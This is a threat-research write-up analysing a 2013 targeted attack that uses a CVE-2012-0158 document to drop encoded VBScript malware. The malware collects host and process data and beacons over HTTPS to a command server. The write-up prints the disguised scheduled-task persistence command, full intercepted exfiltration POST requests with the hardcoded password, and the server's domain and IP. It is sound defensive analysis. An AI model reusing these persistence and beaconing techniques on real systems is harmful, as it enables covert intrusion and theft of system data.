We came across a rather peculiar TTP (Tools, Techniques, and Procedures) in a targeted attack we found recently. This targeted attack uses simpler techniques but still remains effective in infiltrating the target. The weaponized document that was part of this attack was intended for a victim in India as evident from the contents of the decoy document presented post exploitation. The main modules of this attack are implemented in encoded VB scripts as also recently seen with Janicab, however we do not see any connections between the two. It also employs encrypted callback communications over HTTPS.
Figure 1 – Infection cycle
The weaponized document (7a385b08f09f02658f80381ed837ef98) uses CVE-2012-0158 to drop and launch the payload and decoy document. The decoy document contains a recent news article copied from the Hindustan Times detailing an unfortunate and tragic event that occurred recently in India.
Figure 2 – Decoy document
The payload dw20.exe has a simple function, which is to drop two VB scripts and launch them using Windows script host (wscript.exe). The following two files are created
- %Temp%\232n9q4.vbs – It deletes the initial payload dw20.exe and itself.
- %AppData%\checker.vbe – This is the main encoded payload and contains data gathering as well as command and control (CnC) functions.
Encoded VB payload (checker.vbe):
The VB payload checker.vbe is encoded using Microsoft’s script encoder [1] as shown in Figure 3. This method is meant to provide protection to the code and also maintain integrity, as even changing a single character in the encoded script will render it inoperable. While it may be somewhat effective at evading signature matching engines, it is a substitution cipher and is trivial to decode [2].
Figure 3 – Encoded VB script
Once decoded it is clear that the main functionality is implemented in this script. The script initializes the CnC URL variable as shown in Figure 4. It also uses the ID “ent-V4.0″ possibly as an identifier for this attack campaign.
Figure 4 – Hardcoded C2 server and campaign code
The scripts also creates copies of itself with misleading names and creates a scheduled task as well as a startup run entry for persistence of infection. It creates the scheduled task by running the command below. (Note the misspelled word “Experance” and incorrect grammar indicating that the attacker is not a native English speaker.)
"schtasks.exe" /create /tn Microsoft-Experance-Improve /f /sc hourly /mo 2 /tr "wscript.exe %AppData%\Microsoft\Windows\Microsoft-Experance-Improve.vbe"
The script also has a function to gather system information. Here the Netbios name as well as the username is acquired and stored in the “name” variable. It also enumerates all running processes using Winmgmt WMI service and creates a tab separated list in the variable “all” as follows:
ProcessName[Tab]ProcessID[Tab]ParentProcessID[Tab]Priority[Tab]ImagePath
Figure 5 – Data gathering function
Command and Control:
The function that performs the CnC communication is shown below. The function takes a URL as an argument and data to include in the POST header. The communication is done over HTTPS (https://ent[.]wikaba[.]com/9blog/client.php).
Figure 6 – Functions performing POST to remote server
Figure 7 – Command and control behavior
The CnC communication behavior is shown in Figure 7 and is summarized below:
- It beacons with the POST stub parameter “&req=login” repeatedly in a loop with incremental Sleep. The loop is an exponential decay function where the sleep counter is increased by a multiplication factor of two. It continues to make this request until it receives “Success login ” in response. It uses the hardcoded password “wincli” for this request. The request over the wire is intercepted using the man-in-the-middle technique is as shown below:
Request:
POST /9blog/client.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Connection: Keep-Alive
Accept-Language: en-us
Content-Length: 62
Accept: /
Host: ent.wikaba.com
name=Win_{Hostname}–{Username}&passwd=wincli&req=login&content=ent-V4.0
Response:
Success login : Win_{Hostname}–{Username}
name ok
statistic ok
- Once login succeeds, it then beacons with the POST stub parameter “&req=cmd” with the list of processes stored in the “all” variable. It repeatedly makes these requests until it receives “On Error Resume Next ” in response. The fact that it checks for this string indicates that it expect another VB script in response to this request. The intercepted communication over HTTPS is shown below:
Request:
POST /9blog/client.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Connection: Keep-Alive
Accept-Language: en-us
Content-Length: 62
Accept: /
Host: ent.wikaba.com
name=Win_{Hostname}–{Username}&passwd=wincli&req=cmd&content={ProcessList}
Response:
Date: Tue, 30 Jul 2013 16:23:21 GMT
Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7
X-Powered-By: PHP/5.4.7
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
0
- Once the secondary VB script is received, it executes it. The CnC server was not responding with the correct response at the time of analysis and we were unable to obtain the secondary script.
At the time of analysis the CnC server ent.wikaba.com was resolving to 122.10.10.184.
Figure 8 – Location of resolved IP address
Conclusion:
This case demonstrates that even simple techniques can be quite effective. In addition to the use of encoded VB scripts, this malware uses HTTPS/TLS to encrypt its command and control communications. The encoded VB scripts are not usually detected by anti-virus signatures and the encrypted network traffic evades network-based detection.
References:
[1] http://msdn.microsoft.com/en-us/library/xw61tsx7%28v=vs.84%29.aspx
[2] http://www.virtualconspiracy.com/content/articles/breaking-screnc